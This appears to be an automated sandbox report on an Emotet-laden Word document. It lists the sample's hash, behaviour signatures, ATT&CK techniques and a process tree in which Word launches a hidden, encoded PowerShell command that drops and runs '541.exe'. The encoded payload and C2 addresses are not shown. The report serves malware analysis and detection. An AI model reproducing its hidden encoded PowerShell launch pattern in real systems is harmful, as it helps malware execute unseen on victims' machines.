Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    25-01-2020 21:48

General

  • Target

    ec50dd262063dfc0f05309888bd9e76c316af53094c814cddd7f219d9c2035b8.doc

  • Sample

    200125-mh2dmwb2l6

  • SHA256

    ec50dd262063dfc0f05309888bd9e76c316af53094c814cddd7f219d9c2035b8

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs

Extracted

Family

emotet

C2


rsa_pubkey.plain

Signatures

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ec50dd262063dfc0f05309888bd9e76c316af53094c814cddd7f219d9c2035b8.doc" /o ""
    • Enumerates system info in registry
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4940
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en 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
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    PID:3700
    • C:\Users\Admin\541.exe
      "C:\Users\Admin\541.exe"
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:4724
      • C:\Users\Admin\541.exe
        --e3dadc10
        • Suspicious behavior: EmotetMutantsSpam
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:4680

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Discovery
    • Query Registry (T1012): 2
    • System Information Discovery (T1082): 2

Downloads

  • C:\Users\Admin\541.exe
  • memory/4680-14-0x0000000002110000-0x0000000002126000-memory.dmp (Filesize: 88KB)
  • memory/4680-15-0x0000000000400000-0x0000000000488000-memory.dmp (Filesize: 544KB)
  • memory/4724-12-0x0000000002100000-0x0000000002116000-memory.dmp (Filesize: 88KB)